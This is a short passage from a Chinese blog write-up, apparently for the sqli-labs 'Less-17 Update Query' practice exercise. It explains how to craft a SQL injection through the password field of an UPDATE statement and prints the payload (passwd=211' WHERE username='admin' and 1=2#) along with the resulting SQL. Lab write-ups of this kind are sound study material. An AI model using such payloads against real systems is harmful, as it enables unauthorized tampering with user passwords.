因为是UPDATE语句,所以最好还是把剩下的WHERE username='admin'补上,不然可能所有人密码都变了。
所以可以构造的语句是:
uname=admin&passwd=211' WHERE username='admin' and 1=2#&submit=Submit
对应的SQL语句为
UPDATE users SET password = '211' WHERE username='admin' and 1=2#' WHERE username='admin'Less-17 Update Query
本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
Ricky
这个人很懒,什么都没留下
文章评论